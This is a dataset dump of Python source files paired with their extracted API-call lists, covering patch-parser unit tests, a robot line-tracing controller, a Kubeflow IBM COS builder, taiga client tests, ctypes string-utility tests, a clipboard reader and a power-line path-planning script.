code
stringlengths 22
1.05M
| apis
listlengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
|---|---|---|
#!/usr/bin/env python
import unittest
import bugzoo
from bugzoo.patch import Hunk, FilePatch, Patch
from bugzoo.util import dedent
class HunkTestCase(unittest.TestCase):
def test_read_next(self):
from_s = """
@@ -1,7 +1,6 @@
-The Way that can be told of is not the eternal Way;
-The name that can be named is not the eternal name.
The Nameless is the origin of Heaven and Earth;
-The Named is the mother of all things.
+The named is the mother of all things.
+
Therefore let there always be non-being,
so we may see their subtlety,
And let there always be being,
"""
from_s = dedent(from_s)[1:-1]
lines = from_s.split('\n')
hunk = Hunk._read_next(lines)
self.assertEqual(lines, [])
self.assertEqual(str(hunk), from_s)
class FilePatchTestCase(unittest.TestCase):
def test_read_next(self):
from_s = """
diff --git a/file-two.txt b/file-two.txt
new file mode 100644
index 0000000..2990e5b
--- /dev/null
+++ b/file-two.txt
@@ -0,0 +1,2 @@
+This is file two.
+How do you do?
diff --git a/testfile.c b/testfile.c
index f50a1fc..60ed6ff 100644
--- a/testfile.c
+++ b/testfile.c
@@ -6,6 +6,8 @@
int testfun(int a, int b)
x = a + b;
x *= x;
+ int z = 10000;
+
int y;
y = x * 2;
"""
from_s = dedent(from_s)[1:-1]
lines = from_s.split('\n')
expected_l1 = lines[8:]
expected_s1 = '\n'.join(lines[3:8])
expected_s2 = '\n'.join(lines[10:])
patch = FilePatch._read_next(lines)
self.assertEqual(str(patch), expected_s1)
self.assertEqual(lines, expected_l1)
patch = FilePatch._read_next(lines)
self.assertEqual(str(patch), expected_s2)
self.assertEqual(lines, [])
class PatchTestCase(unittest.TestCase):
def test_from_unidiff(self):
from_s = """
diff --git a/file-two.txt b/file-two.txt
new file mode 100644
index 0000000..2990e5b
--- /dev/null
+++ b/file-two.txt
@@ -0,0 +1,2 @@
+This is file two.
+How do you do?
diff --git a/testfile.c b/testfile.c
index f50a1fc..60ed6ff 100644
--- a/testfile.c
+++ b/testfile.c
@@ -6,6 +6,8 @@
int testfun(int a, int b)
x = a + b;
x *= x;
+ int z = 10000;
+
int y;
y = x * 2;
"""
from_s = dedent(from_s)[1:-1]
lines = from_s.split('\n')
expected_s = \
'\n'.join(lines[3:8] + lines[10:])
patch = Patch.from_unidiff(from_s)
self.assertEqual(str(patch), expected_s)
# produced using 'svn diff'
from_s = """
Index: src/joblist.c
===================================================================
--- src/joblist.c (revision 1794)
+++ src/joblist.c (working copy)
@@ -7,7 +7,7 @@
int joblist_append(server *srv, connection *con) {
if (con->in_joblist) return 0;
- con->in_joblist = 1;
+ con->in_joblist = 10000;
if (srv->joblist->size == 0) {
srv->joblist->size = 16;
@@ -19,7 +19,7 @@
srv->joblist->ptr[srv->joblist->used++] = con;
- return 0;
+ return 3300;
}
void joblist_free(server *srv, connections *joblist) {
Index: tests/core-request.t
===================================================================
--- tests/core-request.t (revision 2792)
+++ tests/core-request.t (working copy)
@@ -246,7 +246,7 @@
ok($tf->handle_http($t) == 0, 'Content-Type - image/jpeg');
$t->{REQUEST} = ( <<EOF
- GET /image.JPG HTTP/1.0
+ GET /image.jpg HTTP/1.0
EOF
);
$t->{RESPONSE} = [ { 'HTTP-Protocol' => 'HTTP/1.0', 'HTTP-Status' => 200, 'Content-Type' => 'image/jpeg' } ];
"""
from_s = dedent(from_s)[1:-1]
lines = from_s.split('\n')
expected_s = \
'\n'.join(lines[2:22] + lines[24:])
patch = Patch.from_unidiff(from_s)
self.assertEqual(str(patch), expected_s)
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"bugzoo.patch.Patch.from_unidiff",
"bugzoo.util.dedent",
"bugzoo.patch.Hunk._read_next",
"bugzoo.patch.FilePatch._read_next"
] |
[((4511, 4526), 'unittest.main', 'unittest.main', ([], {}), '()\n', (4524, 4526), False, 'import unittest\n'), ((764, 786), 'bugzoo.patch.Hunk._read_next', 'Hunk._read_next', (['lines'], {}), '(lines)\n', (779, 786), False, 'from bugzoo.patch import Hunk, FilePatch, Patch\n'), ((1740, 1767), 'bugzoo.patch.FilePatch._read_next', 'FilePatch._read_next', (['lines'], {}), '(lines)\n', (1760, 1767), False, 'from bugzoo.patch import Hunk, FilePatch, Patch\n'), ((1881, 1908), 'bugzoo.patch.FilePatch._read_next', 'FilePatch._read_next', (['lines'], {}), '(lines)\n', (1901, 1908), False, 'from bugzoo.patch import Hunk, FilePatch, Patch\n'), ((2816, 2842), 'bugzoo.patch.Patch.from_unidiff', 'Patch.from_unidiff', (['from_s'], {}), '(from_s)\n', (2834, 2842), False, 'from bugzoo.patch import Hunk, FilePatch, Patch\n'), ((4402, 4428), 'bugzoo.patch.Patch.from_unidiff', 'Patch.from_unidiff', (['from_s'], {}), '(from_s)\n', (4420, 4428), False, 'from bugzoo.patch import Hunk, FilePatch, Patch\n'), ((692, 706), 'bugzoo.util.dedent', 'dedent', (['from_s'], {}), '(from_s)\n', (698, 706), False, 'from bugzoo.util import dedent\n'), ((1546, 1560), 'bugzoo.util.dedent', 'dedent', (['from_s'], {}), '(from_s)\n', (1552, 1560), False, 'from bugzoo.util import dedent\n'), ((2673, 2687), 'bugzoo.util.dedent', 'dedent', (['from_s'], {}), '(from_s)\n', (2679, 2687), False, 'from bugzoo.util import dedent\n'), ((4258, 4272), 'bugzoo.util.dedent', 'dedent', (['from_s'], {}), '(from_s)\n', (4264, 4272), False, 'from bugzoo.util import dedent\n')]
|
import pandas as pd
import torch as T
class Data:
"""
Here, we generate input data with 120 time steps, which looks into the future of 30 days.
That is, with the past 120-day data, we attempt to predict whether the return of stock will increase or decrease
after 30 days
"""
def __init__(self, dir):
self.dir = dir
self.time_step = 120
self.how_far = 30
def import_data(self):
data = pd.read_csv(self.dir)
input, target = self.preprocess(data)
input = self.reshape(input)
return input, target
def preprocess(self, data):
data = data['Adj. Close']
input = list()
target = list()
for i in range(data.shape[0]-self.time_step-self.how_far) :
time_series = list(data.iloc[i:i+self.time_step])
adj_ts = time_series/time_series[0]
input.append(adj_ts)
target.append(int(data.iloc[i+self.time_step+self.how_far]/time_series[0]>adj_ts[-1]))
if i%500 == 0 :
print('item',str(i+1),'preprocessed')
return T.Tensor(input), T.Tensor(target)
def reshape(self, data):
return data.transpose(0,1).unsqueeze(2)
|
[
"pandas.read_csv",
"torch.Tensor"
] |
[((461, 482), 'pandas.read_csv', 'pd.read_csv', (['self.dir'], {}), '(self.dir)\n', (472, 482), True, 'import pandas as pd\n'), ((1133, 1148), 'torch.Tensor', 'T.Tensor', (['input'], {}), '(input)\n', (1141, 1148), True, 'import torch as T\n'), ((1150, 1166), 'torch.Tensor', 'T.Tensor', (['target'], {}), '(target)\n', (1158, 1166), True, 'import torch as T\n')]
|
import etrobosim.ev3api as ev3
import etrobosim as ets
# ColorSensorのReflectを使ってP制御でライントレースする。
def calcPID(r, target=20, power=70,P=1.8):
p=r-target
left=power-P*p
right=power+P*p
return (int(left),int(right))
def pidControl(initARM_count=-50,initTAIL_count=0):
left,right=calcPID(colorSensor.getBrightness())
motorL.setPWM(left)
motorR.setPWM(right)
motorARM.setPWM(initARM_count-motorARM.getCount())
motorTAIL.setPWM(initTAIL_count-motorTAIL.getCount())
#print("MotorR={},MotorL={},MotorARM={},Color={}".format(motorR.getCount(),motorL.getCount(),motorARM.getCount(),colorSensor.getBrightness()))
motorR=ev3.Motor(ev3.ePortM.PORT_B,True,ev3.MotorType.LARGE_MOTOR)
motorL=ev3.Motor(ev3.ePortM.PORT_C,True,ev3.MotorType.LARGE_MOTOR)
motorARM=ev3.Motor(ev3.ePortM.PORT_A,True,ev3.MotorType.MEDIUM_MOTOR)
motorTAIL=ev3.Motor(ev3.ePortM.PORT_D,True,ev3.MotorType.LARGE_MOTOR)
motorR.reset()
motorL.reset()
colorSensor=ev3.ColorSensor(ev3.ePortS.PORT_2)
try:
controller=ets.Controller(ets.Course.LEFT)
controller.addHandlers([motorR,motorL,motorARM,motorTAIL,colorSensor])
controller.start(debug=True)
controller.runCyclic(pidControl)
controller.exit_process()
except KeyboardInterrupt:
controller.exit_process()
pass
|
[
"etrobosim.ev3api.Motor",
"etrobosim.ev3api.ColorSensor",
"etrobosim.Controller"
] |
[((651, 712), 'etrobosim.ev3api.Motor', 'ev3.Motor', (['ev3.ePortM.PORT_B', '(True)', 'ev3.MotorType.LARGE_MOTOR'], {}), '(ev3.ePortM.PORT_B, True, ev3.MotorType.LARGE_MOTOR)\n', (660, 712), True, 'import etrobosim.ev3api as ev3\n'), ((718, 779), 'etrobosim.ev3api.Motor', 'ev3.Motor', (['ev3.ePortM.PORT_C', '(True)', 'ev3.MotorType.LARGE_MOTOR'], {}), '(ev3.ePortM.PORT_C, True, ev3.MotorType.LARGE_MOTOR)\n', (727, 779), True, 'import etrobosim.ev3api as ev3\n'), ((787, 849), 'etrobosim.ev3api.Motor', 'ev3.Motor', (['ev3.ePortM.PORT_A', '(True)', 'ev3.MotorType.MEDIUM_MOTOR'], {}), '(ev3.ePortM.PORT_A, True, ev3.MotorType.MEDIUM_MOTOR)\n', (796, 849), True, 'import etrobosim.ev3api as ev3\n'), ((858, 919), 'etrobosim.ev3api.Motor', 'ev3.Motor', (['ev3.ePortM.PORT_D', '(True)', 'ev3.MotorType.LARGE_MOTOR'], {}), '(ev3.ePortM.PORT_D, True, ev3.MotorType.LARGE_MOTOR)\n', (867, 919), True, 'import etrobosim.ev3api as ev3\n'), ((960, 994), 'etrobosim.ev3api.ColorSensor', 'ev3.ColorSensor', (['ev3.ePortS.PORT_2'], {}), '(ev3.ePortS.PORT_2)\n', (975, 994), True, 'import etrobosim.ev3api as ev3\n'), ((1016, 1047), 'etrobosim.Controller', 'ets.Controller', (['ets.Course.LEFT'], {}), '(ets.Course.LEFT)\n', (1030, 1047), True, 'import etrobosim as ets\n')]
|
from kubernetes import client
from kubeflow.fairing.builders.cluster.context_source import ContextSourceInterface
from kubeflow.fairing.cloud import ibm_cloud
from kubeflow.fairing import utils
from kubeflow.fairing.constants import constants
class COSContextSource(ContextSourceInterface):
"""
IBM Cloud Object Storage Context Source.
:param namespace: namespace that IBM COS credential secret created in.
:param region: region name, default to us-geo
:param cos_endpoint_url: IBM COS endpoint url, such as "https://s3..."
"""
def __init__(self, namespace=None, region='us-geo',
cos_endpoint_url=constants.IBM_COS_DEFAULT_ENDPOINT):
self.cos_endpoint_url = cos_endpoint_url
self.region = region
self.namespace = namespace or utils.get_default_target_namespace()
self.aws_access_key_id, self.aws_secret_access_key =\
ibm_cloud.get_ibm_cos_credentials(namespace)
def prepare(self, context_filename): # pylint: disable=arguments-differ
"""
:param context_filename: context filename
"""
self.uploaded_context_url = self.upload_context(context_filename)
def upload_context(self, context_filename):
"""
:param context_filename: context filename
"""
cos_uploader = ibm_cloud.COSUploader(
self.namespace,
self.cos_endpoint_url
)
context_hash = utils.crc(context_filename)
bucket_name = 'kubeflow-' + context_hash.lower()
return cos_uploader.upload_to_bucket(blob_name='fairing-builds/' +
context_hash,
bucket_name=bucket_name,
file_to_upload=context_filename)
def generate_pod_spec(self, image_name, push): # pylint: disable=arguments-differ
"""
:param image_name: name of image to be built
:param push: whether to push image to given registry or not
"""
args = [
"--dockerfile=Dockerfile",
"--destination=" + image_name,
"--context=" + self.uploaded_context_url
]
if not push:
args.append("--no-push")
return client.V1PodSpec(
containers=[
client.V1Container(
name='kaniko',
image=constants.KANIKO_IMAGE,
args=args,
env=[
client.V1EnvVar(name='AWS_REGION',
value=self.region),
client.V1EnvVar(name='AWS_ACCESS_KEY_ID',
value=self.aws_access_key_id),
client.V1EnvVar(name='AWS_SECRET_ACCESS_KEY',
value=self.aws_secret_access_key),
client.V1EnvVar(name='S3_ENDPOINT',
value=self.cos_endpoint_url),
],
volume_mounts=[
client.V1VolumeMount(name="docker-config",
mount_path="/kaniko/.docker/")
]
)
],
restart_policy='Never',
volumes=[
client.V1Volume(name="docker-config",
config_map=client.V1ConfigMapVolumeSource(
name="docker-config"))
])
def cleanup(self):
# TODO(@jinchihe)
pass
|
[
"kubernetes.client.V1EnvVar",
"kubeflow.fairing.cloud.ibm_cloud.COSUploader",
"kubeflow.fairing.utils.crc",
"kubeflow.fairing.cloud.ibm_cloud.get_ibm_cos_credentials",
"kubernetes.client.V1ConfigMapVolumeSource",
"kubernetes.client.V1VolumeMount",
"kubeflow.fairing.utils.get_default_target_namespace"
] |
[((908, 952), 'kubeflow.fairing.cloud.ibm_cloud.get_ibm_cos_credentials', 'ibm_cloud.get_ibm_cos_credentials', (['namespace'], {}), '(namespace)\n', (941, 952), False, 'from kubeflow.fairing.cloud import ibm_cloud\n'), ((1325, 1385), 'kubeflow.fairing.cloud.ibm_cloud.COSUploader', 'ibm_cloud.COSUploader', (['self.namespace', 'self.cos_endpoint_url'], {}), '(self.namespace, self.cos_endpoint_url)\n', (1346, 1385), False, 'from kubeflow.fairing.cloud import ibm_cloud\n'), ((1444, 1471), 'kubeflow.fairing.utils.crc', 'utils.crc', (['context_filename'], {}), '(context_filename)\n', (1453, 1471), False, 'from kubeflow.fairing import utils\n'), ((797, 833), 'kubeflow.fairing.utils.get_default_target_namespace', 'utils.get_default_target_namespace', ([], {}), '()\n', (831, 833), False, 'from kubeflow.fairing import utils\n'), ((3444, 3496), 'kubernetes.client.V1ConfigMapVolumeSource', 'client.V1ConfigMapVolumeSource', ([], {'name': '"""docker-config"""'}), "(name='docker-config')\n", (3474, 3496), False, 'from kubernetes import client\n'), ((2525, 2578), 'kubernetes.client.V1EnvVar', 'client.V1EnvVar', ([], {'name': '"""AWS_REGION"""', 'value': 'self.region'}), "(name='AWS_REGION', value=self.region)\n", (2540, 2578), False, 'from kubernetes import client\n'), ((2644, 2715), 'kubernetes.client.V1EnvVar', 'client.V1EnvVar', ([], {'name': '"""AWS_ACCESS_KEY_ID"""', 'value': 'self.aws_access_key_id'}), "(name='AWS_ACCESS_KEY_ID', value=self.aws_access_key_id)\n", (2659, 2715), False, 'from kubernetes import client\n'), ((2781, 2860), 'kubernetes.client.V1EnvVar', 'client.V1EnvVar', ([], {'name': '"""AWS_SECRET_ACCESS_KEY"""', 'value': 'self.aws_secret_access_key'}), "(name='AWS_SECRET_ACCESS_KEY', value=self.aws_secret_access_key)\n", (2796, 2860), False, 'from kubernetes import client\n'), ((2926, 2990), 'kubernetes.client.V1EnvVar', 'client.V1EnvVar', ([], {'name': '"""S3_ENDPOINT"""', 'value': 'self.cos_endpoint_url'}), "(name='S3_ENDPOINT', value=self.cos_endpoint_url)\n", (2941, 2990), False, 'from kubernetes import client\n'), ((3115, 3188), 'kubernetes.client.V1VolumeMount', 'client.V1VolumeMount', ([], {'name': '"""docker-config"""', 'mount_path': '"""/kaniko/.docker/"""'}), "(name='docker-config', mount_path='/kaniko/.docker/')\n", (3135, 3188), False, 'from kubernetes import client\n')]
|
from taiga.requestmaker import RequestMaker
from taiga.models import User, Project
from taiga import TaigaAPI
import unittest
from mock import patch
from .tools import create_mock_json
from .tools import MockResponse
class TestUsers(unittest.TestCase):
@patch('taiga.requestmaker.RequestMaker.get')
def test_starred_projects(self, mock_requestmaker_get):
mock_requestmaker_get.return_value = MockResponse(
200, create_mock_json('tests/resources/starred_projects.json')
)
rm = RequestMaker('/api/v1', 'fakehost', 'faketoken')
user = User(rm, id=1)
projects = user.starred_projects()
self.assertEqual(len(projects), 2)
self.assertTrue(isinstance(projects[0], Project))
self.assertTrue(isinstance(projects[1], Project))
@patch('taiga.requestmaker.RequestMaker.get')
def test_list_all_users(self, mock_requestmaker_get):
mock_requestmaker_get.return_value = MockResponse(200,
create_mock_json('tests/resources/projects_list_success.json'))
api = TaigaAPI(token='<PASSWORD>')
users = api.users.list()
self.assertEqual(len(users), 1)
self.assertTrue(isinstance(users[0], User))
@patch('taiga.models.Users.get')
def test_me(self, mock_user_get):
rm = RequestMaker('/api/v1', 'fakehost', 'faketoken')
mock_user_get.return_value = User(rm, full_name='Andrea')
api = TaigaAPI(token='<PASSWORD>')
user = api.me()
self.assertEqual(user.full_name, 'Andrea')
|
[
"taiga.TaigaAPI",
"mock.patch",
"taiga.requestmaker.RequestMaker",
"taiga.models.User"
] |
[((261, 305), 'mock.patch', 'patch', (['"""taiga.requestmaker.RequestMaker.get"""'], {}), "('taiga.requestmaker.RequestMaker.get')\n", (266, 305), False, 'from mock import patch\n'), ((811, 855), 'mock.patch', 'patch', (['"""taiga.requestmaker.RequestMaker.get"""'], {}), "('taiga.requestmaker.RequestMaker.get')\n", (816, 855), False, 'from mock import patch\n'), ((1227, 1258), 'mock.patch', 'patch', (['"""taiga.models.Users.get"""'], {}), "('taiga.models.Users.get')\n", (1232, 1258), False, 'from mock import patch\n'), ((523, 571), 'taiga.requestmaker.RequestMaker', 'RequestMaker', (['"""/api/v1"""', '"""fakehost"""', '"""faketoken"""'], {}), "('/api/v1', 'fakehost', 'faketoken')\n", (535, 571), False, 'from taiga.requestmaker import RequestMaker\n'), ((587, 601), 'taiga.models.User', 'User', (['rm'], {'id': '(1)'}), '(rm, id=1)\n', (591, 601), False, 'from taiga.models import User, Project\n'), ((1067, 1095), 'taiga.TaigaAPI', 'TaigaAPI', ([], {'token': '"""<PASSWORD>"""'}), "(token='<PASSWORD>')\n", (1075, 1095), False, 'from taiga import TaigaAPI\n'), ((1310, 1358), 'taiga.requestmaker.RequestMaker', 'RequestMaker', (['"""/api/v1"""', '"""fakehost"""', '"""faketoken"""'], {}), "('/api/v1', 'fakehost', 'faketoken')\n", (1322, 1358), False, 'from taiga.requestmaker import RequestMaker\n'), ((1396, 1424), 'taiga.models.User', 'User', (['rm'], {'full_name': '"""Andrea"""'}), "(rm, full_name='Andrea')\n", (1400, 1424), False, 'from taiga.models import User, Project\n'), ((1439, 1467), 'taiga.TaigaAPI', 'TaigaAPI', ([], {'token': '"""<PASSWORD>"""'}), "(token='<PASSWORD>')\n", (1447, 1467), False, 'from taiga import TaigaAPI\n')]
|
#!/usr/bin/env python3
from ctypes import *
import sys
loader = cdll.LoadLibrary
lib = loader("../bin/util.so")
def testreverse():
successCount = 0
failCount = 0
dm=["43434fffdsfasf",
"sdfsadfsdff",
"dfsadfsdfasdfasdfsdfasdfasdfasdfsdfsdf",
"r3rednhdfvhfijdsbhnjhjfhikjhuiijuiwu87439",
"",
"dfasdfa12323",
"1111111234567900009876545678765445",
"0000000000",
"11111",
"2222",
"1a1",
"22sss"
]
lib.reverse.restype = c_char_p
for i in dm:
l=c_char_p(str.encode(i))
ret=lib.reverse(l)
if ret.decode()==i[::-1]:
successCount += 1
else:
failCount += 1
print("Failed at:",i)
print(sys._getframe().f_code.co_name,"Passed:",successCount,"Failed:",failCount)
def testctoi():
successCount = 0
failCount = 0
dm=['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f']
lib.ctoi.restype = c_int
for i in dm:
c=c_char(str.encode(i))
ret=lib.ctoi(c)
# print("testctoi:",ret)
if ret==int(i,16):
successCount += 1
else:
failCount += 1
print("Failed at:",i)
print(sys._getframe().f_code.co_name,"Passed:",successCount,"Failed:",failCount)
def testitoc():
successCount = 0
failCount = 0
dm=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15]
lib.itoc.restype = c_char
for i in dm:
ret=lib.itoc(i, 16)
if i == int(ret, 16):
successCount += 1
else:
failCount += 1
print("Failed at:",i)
print(sys._getframe().f_code.co_name,"Passed:",successCount,"Failed:",failCount)
def testlstrip():
successCount = 0
failCount = 0
dm=[" 43434fffdsfasf",
"sdfsadfsdff ",
"dfsadfsdf asdfasdfsdfasdfasdfasdfsdfsdf",
"r3rednhdfvhf ijdsbhnjhjfhikjhuiijuiwu87439",
"",
" ",
" dfasdfa12323 ",
"1111111234567900009876545678765445",
"0000000000",
"11111",
"2222",
"1a1",
"22sss "
]
lib.lstrip.restype = c_char_p
for i in dm:
l=c_char_p(str.encode(i))
c=c_char(str.encode("a"))
ret=lib.lstrip(l, c)
if ret.decode() == i.lstrip("a"):
successCount += 1
else:
failCount += 1
print("Failed at:",i)
print(sys._getframe().f_code.co_name,"Passed:",successCount,"Failed:",failCount)
def testrpad():
successCount = 0
failCount = 0
dm=[("abcdef", "c", 7),
("abcdef", "0", 0),
("abcdef", "0", 1),
("abcdef", "0", 100),
]
lib.rpad.restype = c_char_p
for i in dm:
dest=c_char_p(bytes(i[2]))
src=c_char_p(str.encode(i[0]))
c=c_char(str.encode(i[1]))
len=c_int(i[2])
ret=lib.rpad(dest, src, c, len)
if ret.decode() == i[0].ljust(i[2], i[1]):
successCount += 1
else:
failCount += 1
print("Failed at:",i)
print("ret:", ret.decode())
print("expect:", i[0].ljust(i[2], i[1]))
print(sys._getframe().f_code.co_name,"Passed:",successCount,"Failed:",failCount)
#'''
testreverse()
testctoi()
testitoc()
testlstrip()
#'''
testrpad()
|
[
"sys._getframe"
] |
[((763, 778), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (776, 778), False, 'import sys\n'), ((1246, 1261), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (1259, 1261), False, 'import sys\n'), ((1647, 1662), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (1660, 1662), False, 'import sys\n'), ((2470, 2485), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (2483, 2485), False, 'import sys\n'), ((3205, 3220), 'sys._getframe', 'sys._getframe', ([], {}), '()\n', (3218, 3220), False, 'import sys\n')]
|
"""Try to read Windows clipboard text"""
import ctypes
CF_TEXT = 1
KERNEL32 = ctypes.windll.kernel32
USER32 = ctypes.windll.user32
def get_clipboard_text():
"""Get Windows clipboard text using WinAPI functions"""
USER32.OpenClipboard(0)
text = None
if USER32.IsClipboardFormatAvailable(CF_TEXT):
data = USER32.GetClipboardData(CF_TEXT)
data_locked = KERNEL32.GlobalLock(data)
text = ctypes.c_char_p(data_locked).value
KERNEL32.GlobalUnlock(data_locked)
return text
USER32.CloseClipboard()
if not text:
raise Exception('No text in clipboard')
return text
if __name__ == '__main__':
print(get_clipboard_text())
|
[
"ctypes.c_char_p"
] |
[((431, 459), 'ctypes.c_char_p', 'ctypes.c_char_p', (['data_locked'], {}), '(data_locked)\n', (446, 459), False, 'import ctypes\n')]
|
import argparse
import os
import pickle
import time
# import warnings
import numpy as np
from power_planner.utils.utils import get_distance_surface
from csv import writer
import warnings
import matplotlib.pyplot as plt
# utils imports
from power_planner.utils.utils_ksp import KspUtils
from power_planner.utils.utils_costs import CostUtils
from power_planner.evaluate_path import save_path_cost_csv
from power_planner import graphs
def logging(
ID, graph, path, path_costs, cfg, N_EDGES, time_pipeline, comp_path=None
):
if comp_path is None:
max_eucl = 0
mean_eucl = 0
else:
# compute path distances and multiply with resolution to get meters
max_eucl = (
KspUtils.path_distance(path, comp_path, mode="eucl_max") *
cfg.scale * 10
)
mean_eucl = (
KspUtils.path_distance(path, comp_path, mode="eucl_mean") *
cfg.scale * 10
)
# SAVE timing test
angle_cost = round(np.sum(CostUtils.compute_angle_costs(path)), 2)
n_categories = len(cfg.class_weights)
path_costs = np.asarray(path_costs)
summed_costs = np.around(np.sum(path_costs[:, -n_categories:], axis=0), 2)
weighted_sum = round(np.dot(summed_costs, cfg.class_weights), 2)
n_pixels = np.sum(belgium_inst_corr > 0)
# csv_header = ["ID", "instance", "resolution", "graph", "number pixels"
# "space edges", "overall time",
# "time vertex adding", "time edge adding", "time shortest path",
# "angle cost", "category costs", "sum of costs"]
logs = [
ID, INST, SCALE_PARAM * 10, n_pixels, graphtype, graph.n_nodes,
N_EDGES, time_pipeline, graph.time_logs["add_nodes"],
graph.time_logs["add_all_edges"], graph.time_logs["shortest_path"],
cfg.angle_weight, angle_cost, summed_costs, weighted_sum, mean_eucl,
max_eucl
]
with open(cfg.csv_times, 'a+', newline='') as write_obj:
# Create a writer object from csv module
csv_writer = writer(write_obj)
# Add contents of list as last row in the csv file
csv_writer.writerow(logs)
parser = argparse.ArgumentParser()
parser.add_argument('-cluster', action='store_true')
parser.add_argument('-i', '--instance', type=str, default="ch")
parser.add_argument('-s', '--scale', help="resolution", type=int, default=1)
args = parser.parse_args()
# define out save name
# ID = "results_" + args.instance # str(round(time.time() / 60))[-5:]
OUT_DIR = os.path.join("..", "outputs")
SCALE_PARAM = args.scale
SCENARIO = 1
INST = args.instance
height_resistance_path = None # "../data/Instance_CH.nosync/dtm_10m.tif"
PIPELINE = [(1, 0)]
USE_KSP = 0
GRAPH_TYPE = graphs.ImplicitLG
# LineGraph, WeightedGraph, RandomWeightedGraph, RandomLineGraph, ImplicitLG
# ImplicitLgKSP, WeightedKSP
print("graph type:", GRAPH_TYPE)
# summarize: mean/max/min, remove: all/surrounding, sample: simple/watershed
NOTES = "None" # "mean-all-simple"
# define IO paths
PATH_FILES = "data"
# PIPE = [(MAX_EDGES, D1), (MAX_EDGES, D2), (MAX_EDGES, 0)]
PIPELINES = [[1], [2, 1], [4, 2, 1], [3, 1]]
print("PIPELINES:", PIPELINES)
mult_factor = 13
random = 0
graph_names = ["Normal graph", "Implicit line graph", "Line graph"]
for INST, SCALE_PARAM in zip(["belgium", "de", "ch"], [1, 2, 2]):
print("")
print("---------------------------------------------------")
print(INST, SCALE_PARAM)
# LOAD DATA
IOPATH = os.path.join(
PATH_FILES, f"{INST}_data_{SCENARIO}_{SCALE_PARAM}.dat"
)
with open(IOPATH, "rb") as infile:
data = pickle.load(infile)
(
belgium_inst, belgium_edge_inst, belgium_inst_corr, belgium_config
) = data
cfg = belgium_config.graph
start_inds = belgium_config.graph.start_inds
dest_inds = belgium_config.graph.dest_inds
# iterate over pipelines
ground_truth_paths = [[], []]
for pipe_kind, PIPE in enumerate(PIPELINES):
ID = str(PIPE)
print("------------- NEW PIPELINE ", PIPE, "-----------------------")
for g, GRAPH in enumerate([graphs.WeightedGraph, graphs.ImplicitLG]):
print("")
print(GRAPH)
print("")
graphtype = graph_names[g]
graph = GRAPH(belgium_inst, belgium_inst_corr, verbose=False)
corridor = np.ones(belgium_inst_corr.shape) * 0.5
tic = time.time()
actual_pipe = []
edge_numbers = []
for pipe_step, factor in enumerate(PIPE):
if random:
factor = 1 - (1 / factor**2)
graph.set_corridor(
corridor,
cfg.start_inds,
cfg.dest_inds,
factor_or_n_edges=factor,
sample_method="simple"
)
# main path computation
path_gt, path_costs_gt, cost_sum_wg = graph.single_sp(
**vars(cfg)
)
edge_numbers.append(graph.n_edges)
if factor == 1 or factor == 0:
actual_pipe.append((1, 0))
break
corridor = get_distance_surface(
graph.hard_constraints.shape,
[path_gt],
mode="dilation",
n_dilate=10 # dist
)
# estimated edges are pixels times neighbors
# divided by resolution squared
estimated_edges_10 = len(np.where(corridor > 0)[0]) * len(
graph.shifts
) / ((PIPE[pipe_step + 1])**2)
now_dist = (mult_factor * graph.n_edges) / estimated_edges_10
# print("reduce corridor:", dist)
corridor = get_distance_surface(
graph.hard_constraints.shape, [path_gt],
mode="dilation",
n_dilate=int(np.ceil(now_dist))
)
# print(
# "estimated with distance ", int(np.ceil(now_dist)),
# len(np.where(corridor > 0)[0]) * len(graph.shifts) /
# ((PIPE[pipe_step + 1])**2)
# )
actual_pipe.append([factor, int(np.ceil(now_dist))])
graph.remove_vertices(corridor)
time_pipeline = time.time() - tic
print("OVERALL TIME:", time_pipeline)
nr_edges = np.max(edge_numbers)
if pipe_kind == 0:
ground_truth_paths[g] = path_gt
path_bl = ground_truth_paths[g]
logging(
ID,
graph,
path_gt,
path_costs_gt,
cfg,
nr_edges,
time_pipeline,
comp_path=path_bl
)
|
[
"numpy.sum",
"argparse.ArgumentParser",
"csv.writer",
"numpy.ceil",
"numpy.asarray",
"power_planner.utils.utils_costs.CostUtils.compute_angle_costs",
"numpy.ones",
"power_planner.utils.utils_ksp.KspUtils.path_distance",
"time.time",
"numpy.max",
"pickle.load",
"numpy.where",
"numpy.dot",
"power_planner.utils.utils.get_distance_surface",
"os.path.join"
] |
[((2127, 2152), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (2150, 2152), False, 'import argparse\n'), ((2479, 2508), 'os.path.join', 'os.path.join', (['""".."""', '"""outputs"""'], {}), "('..', 'outputs')\n", (2491, 2508), False, 'import os\n'), ((1095, 1117), 'numpy.asarray', 'np.asarray', (['path_costs'], {}), '(path_costs)\n', (1105, 1117), True, 'import numpy as np\n'), ((1281, 1310), 'numpy.sum', 'np.sum', (['(belgium_inst_corr > 0)'], {}), '(belgium_inst_corr > 0)\n', (1287, 1310), True, 'import numpy as np\n'), ((3436, 3505), 'os.path.join', 'os.path.join', (['PATH_FILES', 'f"""{INST}_data_{SCENARIO}_{SCALE_PARAM}.dat"""'], {}), "(PATH_FILES, f'{INST}_data_{SCENARIO}_{SCALE_PARAM}.dat')\n", (3448, 3505), False, 'import os\n'), ((1147, 1192), 'numpy.sum', 'np.sum', (['path_costs[:, -n_categories:]'], {'axis': '(0)'}), '(path_costs[:, -n_categories:], axis=0)\n', (1153, 1192), True, 'import numpy as np\n'), ((1222, 1261), 'numpy.dot', 'np.dot', (['summed_costs', 'cfg.class_weights'], {}), '(summed_costs, cfg.class_weights)\n', (1228, 1261), True, 'import numpy as np\n'), ((2005, 2022), 'csv.writer', 'writer', (['write_obj'], {}), '(write_obj)\n', (2011, 2022), False, 'from csv import writer\n'), ((3574, 3593), 'pickle.load', 'pickle.load', (['infile'], {}), '(infile)\n', (3585, 3593), False, 'import pickle\n'), ((995, 1030), 'power_planner.utils.utils_costs.CostUtils.compute_angle_costs', 'CostUtils.compute_angle_costs', (['path'], {}), '(path)\n', (1024, 1030), False, 'from power_planner.utils.utils_costs import CostUtils\n'), ((4396, 4407), 'time.time', 'time.time', ([], {}), '()\n', (4405, 4407), False, 'import time\n'), ((6491, 6511), 'numpy.max', 'np.max', (['edge_numbers'], {}), 